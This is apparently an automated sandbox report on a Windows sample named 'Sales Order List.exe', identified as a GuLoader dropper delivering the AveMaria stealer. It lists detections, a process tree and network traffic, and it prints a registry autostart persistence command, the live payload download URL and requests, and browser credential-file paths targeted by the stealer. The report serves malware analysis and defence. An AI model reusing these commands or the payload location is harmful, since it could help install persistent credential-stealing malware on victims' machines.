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Windows Analysis Report Sales Order List.exe


General Information

Sample Name:Sales Order List.exe
Analysis ID:526595

Most interesting Screenshot:


GuLoader AveMaria
Range:0 - 100


Found malware configuration
Yara detected Generic Dropper
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AveMaria stealer
GuLoader behavior detected
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to detect Any.run
Increases the number of concurrent connection per server for Internet Explorer
Contains functionality to hide user accounts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
Creates an undocumented autostart registry key
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Sigma detected: Direct Autorun Keys Modification
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to detect virtual machines (SLDT)
Uses reg.exe to modify the Windows registry
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)


Process Tree

  • System is w10x64native
  • Sales Order List.exe (PID: 5788 cmdline: "C:\Users\user\Desktop\Sales Order List.exe" MD5: 80BAD0903EE7EC98805678673720CFD9)
    • Sales Order List.exe (PID: 6892 cmdline: "C:\Users\user\Desktop\Sales Order List.exe" MD5: 80BAD0903EE7EC98805678673720CFD9)
      • explorer.exe (PID: 4576 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
      • cmd.exe (PID: 6232 cmdline: cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 4904 cmdline: REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • images.exe (PID: 4192 cmdline: C:\ProgramData\images.exe MD5: 80BAD0903EE7EC98805678673720CFD9)
        • WerFault.exe (PID: 4220 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 740 MD5: 40A149513D721F096DDF50C04DA2F01F)
        • WerFault.exe (PID: 3440 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 772 MD5: 40A149513D721F096DDF50C04DA2F01F)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=downloads;R"}

Yara Overview

Memory Dumps

00000002.00000002.125547203981.00000000022E0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    0000000F.00000000.125996962988.0000000002330000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      0000000F.00000000.125886367131.0000000002330000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        00000004.00000000.125545111088.0000000001660000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          0000000F.00000000.125990940523.0000000002330000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 14 entries

            Unpacked PEs

            4.3.Sales Order List.exe.18f3e10.3.raw.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
            • 0x3100:$a1: \Opera Software\Opera Stable\Login Data
            • 0x3428:$a2: \Comodo\Dragon\User Data\Default\Login Data
            • 0x2d70:$a3: \Google\Chrome\User Data\Default\Login Data
            4.3.Sales Order List.exe.18f3e10.3.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              4.3.Sales Order List.exe.18f3e10.3.raw.unpackJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
                4.3.Sales Order List.exe.18f3e10.3.raw.unpackAveMaria_WarZoneunknownunknown
                • 0x51a8:$str1: cmd.exe /C ping -n 2 -w 1000 > Nul & Del /f /q
                • 0x4efc:$str2: MsgBox.exe
                • 0x4dd0:$str6: Ave_Maria
                • 0x4470:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                • 0x3a90:$str8: SMTP Password
                • 0x2d70:$str11: \Google\Chrome\User Data\Default\Login Data
                • 0x4448:$str12: \sqlmap.dll
                4.3.Sales Order List.exe.18f3e10.7.raw.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x3100:$a1: \Opera Software\Opera Stable\Login Data
                • 0x3428:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x2d70:$a3: \Google\Chrome\User Data\Default\Login Data
                Click to see the 3 entries

                Sigma Overview

                System Summary:

                Sigma detected: Direct Autorun Keys ModificationShow sources
                Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe", CommandLine: REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6232, ProcessCommandLine: REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe", ProcessId: 4904

                Jbx Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                Found malware configurationShow sources
                Source: 00000002.00000002.125547203981.00000000022E0000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=downloads;R"}
                Multi AV Scanner detection for submitted fileShow sources
                Source: Sales Order List.exeReversingLabs: Detection: 40%
                Yara detected AveMaria stealerShow sources
                Source: Yara matchFile source: 4.3.Sales Order List.exe.18f3e10.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.3.Sales Order List.exe.18f3e10.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000003.125765591469.00000000018A8000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.125766752022.00000000018F2000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.125766920138.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.125766406921.00000000018A8000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.125766059758.00000000018F2000.00000004.00000001.sdmp, type: MEMORY
                Multi AV Scanner detection for dropped fileShow sources
                Source: C:\ProgramData\images.exeReversingLabs: Detection: 40%
                Source: 4.3.Sales Order List.exe.18f3e10.7.unpackAvira: Label: TR/Crypt.XPACK.Gen2
                Source: 4.3.Sales Order List.exe.18f3e10.3.unpackAvira: Label: TR/Crypt.XPACK.Gen2
                Source: unknownHTTPS traffic detected: -> version: TLS 1.2
                Source: unknownHTTPS traffic detected: -> version: TLS 1.2
                Source: C:\Users\user\Desktop\Sales Order List.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
                Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126024539923.00000000068B8000.00000004.00000001.sdmp
                Source: Binary string: Kernel.Appcore.pdb( source: WerFault.exe, 00000014.00000003.125904782894.0000000005CEB000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126018047691.0000000006475000.00000004.00000001.sdmp
                Source: Binary string: wgdi32full.pdb( source: WerFault.exe, 00000014.00000003.125904003059.0000000002DFC000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126008791375.00000000033D5000.00000004.00000001.sdmp
                Source: Binary string: coml2.pdb6H&8e source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp
                Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000014.00000003.125899753643.0000000002D6E000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009250720.000000000334B000.00000004.00000001.sdmp
                Source: Binary string: ntmarta.pdb( source: WerFault.exe, 00000014.00000003.125910819500.0000000005D29000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126023579033.00000000068B2000.00000004.00000001.sdmp
                Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126008890066.00000000033E0000.00000004.00000001.sdmp
                Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000014.00000003.125905933053.0000000005C3F000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
                Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126013564666.00000000033F7000.00000004.00000001.sdmp
                Source: Binary string: wntdll.pdb source: WerFault.exe, 00000014.00000003.125899753643.0000000002D6E000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126033173702.0000000005431000.00000004.00000001.sdmp
                Source: Binary string: shcore.pdb$H48s source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp
                Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 00000014.00000003.125913249873.0000000005D18000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126017165802.000000000649F000.00000004.00000001.sdmp
                Source: Binary string: shcore.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
                Source: Binary string: apphelp.pdb( source: WerFault.exe, 00000014.00000003.125903738538.0000000002D80000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009354250.0000000003358000.00000004.00000001.sdmp
                Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000014.00000003.125905520713.0000000002DF6000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126033269253.0000000005520000.00000004.00000040.sdmp
                Source: Binary string: oleaut32.pdb( source: WerFault.exe, 00000014.00000003.125909078051.0000000005CE0000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126012936139.000000000646A000.00000004.00000001.sdmp
                Source: Binary string: advapi32.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126010636897.00000000033E6000.00000004.00000001.sdmp
                Source: Binary string: ucrtbase.pdb( source: WerFault.exe, 00000014.00000003.125905831080.0000000005C34000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126008890066.00000000033E0000.00000004.00000001.sdmp
                Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000014.00000003.125910819500.0000000005D29000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126023579033.00000000068B2000.00000004.00000001.sdmp
                Source: Binary string: coml2.pdb( source: WerFault.exe, 00000017.00000003.126018806279.000000000648C000.00000004.00000001.sdmp
                Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126008843786.00000000033DB000.00000004.00000001.sdmp
                Source: Binary string: wimm32.pdb( source: WerFault.exe, 00000014.00000003.125904733671.0000000005CE6000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126016753163.0000000006470000.00000004.00000001.sdmp
                Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000014.00000003.125900100057.0000000002D6E000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009302903.0000000003351000.00000004.00000001.sdmp
                Source: Binary string: wimm32.pdb source: WerFault.exe, 00000014.00000003.125904733671.0000000005CE6000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126016753163.0000000006470000.00000004.00000001.sdmp
                Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 00000014.00000003.125915266650.0000000005D13000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126022235396.0000000006499000.00000004.00000001.sdmp
                Source: Binary string: TextShaping.pdb source: WerFault.exe, 00000014.00000003.125917002362.0000000006562000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009302903.0000000003351000.00000004.00000001.sdmp
                Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000014.00000003.125927969397.0000000005260000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126008696474.00000000033CA000.00000004.00000001.sdmp
                Source: Binary string: oleaut32.pdbQ source: WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
                Source: Binary string: CoreMessaging.pdb( source: WerFault.exe, 00000014.00000003.125913249873.0000000005D18000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126017165802.000000000649F000.00000004.00000001.sdmp
                Source: Binary string: sxs.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
                Source: Binary string: bcryptprimitives.pdb( source: WerFault.exe, 00000014.00000003.125909199577.0000000005CF1000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126016848001.000000000647B000.00000004.00000001.sdmp
                Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126019837993.000000000613C000.00000004.00000001.sdmp
                Source: Binary string: sechost.pdb( source: WerFault.exe, 00000014.00000003.125905988617.0000000005C45000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126010047688.00000000033F1000.00000004.00000001.sdmp
                Source: Binary string: combase.pdb( source: WerFault.exe, 00000014.00000003.125907854720.0000000002E1D000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126010408748.00000000060E2000.00000004.00000001.sdmp
                Source: Binary string: CoreUIComponents.pdb( source: WerFault.exe, 00000014.00000003.125915266650.0000000005D13000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126022235396.0000000006499000.00000004.00000001.sdmp
                Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000014.00000003.125899753643.0000000002D6E000.00000004.00000001.sdmp
                Source: Binary string: msvcrt.pdb( source: WerFault.exe, 00000014.00000003.125905933053.0000000005C3F000.00000004.00000001.sdmp
                Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000014.00000003.125917746027.0000000005D1E000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
                Source: Binary string: advapi32.pdb( source: WerFault.exe, 00000014.00000003.125907125589.0000000005C3A000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126010636897.00000000033E6000.00000004.00000001.sdmp
                Source: Binary string: coml2.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126018806279.000000000648C000.00000004.00000001.sdmp
                Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126008791375.00000000033D5000.00000004.00000001.sdmp
                Source: Binary string: WinTypes.pdb( source: WerFault.exe, 00000017.00000003.126024539923.00000000068B8000.00000004.00000001.sdmp
                Source: Binary string: sechost.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126010047688.00000000033F1000.00000004.00000001.sdmp
                Source: Binary string: ws2_32.pdb8H 8 source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp
                Source: Binary string: wrpcrt4.pdb( source: WerFault.exe, 00000017.00000003.126013564666.00000000033F7000.00000004.00000001.sdmp
                Source: Binary string: msctf.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126021040208.0000000006486000.00000004.00000001.sdmp
                Source: Binary string: ,wntdll.pdb source: WerFault.exe, 00000014.00000003.125899412774.0000000002D70000.00000004.00000001.sdmp
                Source: Binary string: wwin32u.pdb( source: WerFault.exe, 00000017.00000003.126008696474.00000000033CA000.00000004.00000001.sdmp
                Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 00000014.00000003.125910630742.0000000005D0D000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126022159017.0000000006493000.00000004.00000001.sdmp
                Source: Binary string: ole32.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
                Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126018047691.0000000006475000.00000004.00000001.sdmp
                Source: Binary string: TextShaping.pdb( source: WerFault.exe, 00000014.00000003.125917002362.0000000006562000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126023187158.00000000068BD000.00000004.00000001.sdmp
                Source: Binary string: ws2_32.pdb( source: WerFault.exe, 00000014.00000003.125917746027.0000000005D1E000.00000004.00000001.sdmp
                Source: Binary string: wUxTheme.pdb( source: WerFault.exe, 00000017.00000003.126019837993.000000000613C000.00000004.00000001.sdmp
                Source: Binary string: wgdi32.pdb( source: WerFault.exe, 00000014.00000003.125905520713.0000000002DF6000.00000004.00000001.sdmp
                Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000014.00000003.125909199577.0000000005CF1000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126016848001.000000000647B000.00000004.00000001.sdmp
                Source: Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: Sales Order List.exe, 00000004.00000003.125766201878.000000001F5C1000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.125849081972.000000000EA70000.00000040.00000001.sdmp
                Source: Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: Sales Order List.exe, 00000004.00000003.125766201878.000000001F5C1000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.125849081972.000000000EA70000.00000040.00000001.sdmp
                Source: Binary string: msctf.pdb( source: WerFault.exe, 00000014.00000003.125910562779.0000000005D02000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126021040208.0000000006486000.00000004.00000001.sdmp
                Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000014.00000003.125903704223.0000000002D7B000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009302903.0000000003351000.00000004.00000001.sdmp
                Source: Binary string: combase.pdb source: WerFault.exe, 00000014.00000003.125907854720.0000000002E1D000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126010408748.00000000060E2000.00000004.00000001.sdmp
                Source: Binary string: wuser32.pdb( source: WerFault.exe, 00000014.00000003.125905424783.0000000002DEB000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126008630763.00000000033C4000.00000004.00000001.sdmp
                Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000014.00000003.125903667098.0000000002D75000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126009250720.000000000334B000.00000004.00000001.sdmp
                Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000014.00000003.125928027487.0000000005268000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126012936139.000000000646A000.00000004.00000001.sdmp
                Source: Binary string: coml2.pdb} source: WerFault.exe, 00000017.00000003.126033336482.0000000005528000.00000004.00000040.sdmp
                Source: Binary string: TextInputFramework.pdb( source: WerFault.exe, 00000014.00000003.125910630742.0000000005D0D000.00000004.00000001.sdmp
                Source: Binary string: apphelp.pdb source: WerFault.exe, 00000014.00000003.125927969397.0000000005260000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.126009354250.0000000003358000.00000004.00000001.sdmp
                Source: Binary string: wuser32.pdb source: WerFault.exe, 00000014.00000003.125905424783.0000000002DEB000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126008630763.00000000033C4000.00000004.00000001.sdmp
                Source: Binary string: ole32.pdb( source: WerFault.exe, 00000014.00000003.125907817675.0000000002E17000.00000004.00000001.sdmp
                Source: Binary string: msvcp_win.pdb( source: WerFault.exe, 00000014.00000003.125904042199.0000000002E01000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.126008843786.00000000033DB000.00000004.00000001.sdmp


                C2 URLs / IPs found in malware configurationShow sources
                Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=downloads;R
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Joe Sandbox ViewIP Address:
                Source: Joe Sandbox ViewIP Address:
                Source: global trafficHTTP traffic detected: GET /uc?export=download&id=14riMs-By6HjEY7hTtEKf9cx7RhIUcVvn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/145unl5irik8qdpdmfh83ttj403osrln/1637606400000/11605847516605788748/*/14riMs-By6HjEY7hTtEKf9cx7RhIUcVvn?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0k-48-docs.googleusercontent.comConnection: Keep-Alive
                Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                Source: unknownTCP traffic detected without corresponding DNS query:
                Source: unknownTCP traffic detected without corresponding DNS query:
                Source: unknownTCP traffic detected without corresponding DNS query:
                Source: unknownTCP traffic detected without corresponding DNS query:
                Source: unknownTCP traffic detected without corresponding DNS query:
                Source: unknownTCP traffic detected without corresponding DNS query:
                Source: unknownTCP traffic detected without corresponding DNS query:
                Source: unknownUDP traffic detected without corresponding DNS query:
                Source: unknownUDP traffic detected without corresponding DNS query:
                Source: Sales Order List.exe, 00000004.00000003.125873230933.00000000018A9000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000002.125984504149.0000000005CE1000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000002.126063872302.0000000003308000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: Sales Order List.exe, 00000004.00000003.125873230933.00000000018A9000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000002.125984504149.0000000005CE1000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000002.126063872302.0000000003308000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: explorer.exe, 0000000B.00000000.125799531795.0000000010A6D000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                Source: explorer.exe, 0000000B.00000002.130410544642.000000000CFBC000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%
                Source: explorer.exe, 0000000B.00000000.125799531795.0000000010A6D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                Source: explorer.exe, 0000000B.00000002.130379831569.0000000000904000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
                Source: explorer.exe, 0000000B.00000002.130410016644.000000000CF7B000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                Source: explorer.exe, 0000000B.00000000.125786547597.000000000A940000.00000002.00020000.sdmpString found in binary or memory: http://schemas.micro
                Source: Sales Order List.exeString found in binary or memory: http://topqualityfreeware.com
                Source: Amcache.hve.LOG1.20.drString found in binary or memory: http://upx.sf.net
                Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmpString found in binary or memory: http://www.foreca.com
                Source: Sales Order List.exeString found in binary or memory: http://www.topqualityfreeware.com/
                Source: explorer.exe, 0000000B.00000002.130415876105.0000000010478000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppEM
                Source: explorer.exe, 0000000B.00000000.125824449017.0000000002E75000.00000004.00000001.sdmpString found in binary or memory: https://aka.ms/odirme
                Source: explorer.exe, 0000000B.00000002.130409357270.000000000CEEE000.00000004.00000001.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                Source: explorer.exe, 0000000B.00000000.125824045068.0000000002E1A000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com/
                Source: explorer.exe, 0000000B.00000002.130406454585.000000000CBA2000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                Source: explorer.exe, 0000000B.00000002.130396156143.0000000009501000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
                Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
                Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                Source: explorer.exe, 0000000B.00000000.125782425758.00000000093FE000.00000004.00000001.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?P
                Source: explorer.exe, 0000000B.00000002.130396156143.0000000009501000.00000004.00000001.sdmpString found in binary or memory: https://arc.msn.com
                Source: explorer.exe, 0000000B.00000002.130390532984.0000000004FA5000.00000004.00000001.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
                Source: explorer.exe, 0000000B.00000000.125845469977.000000000CF00000.00000004.00000001.sdmpString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivation
                Source: explorer.exe, 0000000B.00000002.130379831569.0000000000904000.00000004.00000020.sdmpString found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivations
                Source: Sales Order List.exe, 00000004.00000003.125743274575.00000000018B4000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
                Source: Sales Order List.exe, 00000004.00000003.125743274575.00000000018B4000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
                Source: Sales Order List.exeString found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/
                Source: Sales Order List.exe, 00000004.00000003.125871810697.0000000001879000.00000004.00000001.sdmpString found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/%%doc-0k-48-docs.googleusercontent.com
                Source: Sales Order List.exe, 00000004.00000003.125872058569.000000000189B000.00000004.00000001.sdmpString found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/3
                Source: Sales Order List.exe, 00000004.00000003.125872058569.000000000189B000.00000004.00000001.sdmpString found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/7
                Source: Sales Order List.exe, 00000004.00000003.125871877283.0000000001883000.00000004.00000001.sdmpString found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/S~
                Source: Sales Order List.exe, 00000004.00000003.125743274575.00000000018B4000.00000004.00000001.sdmpString found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/145unl5i
                Source: Sales Order List.exe, 00000004.00000003.125873230933.00000000018A9000.00000004.00000001.sdmpString found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/w
                Source: Sales Order List.exe, 00000004.00000003.125871692204.0000000001870000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/
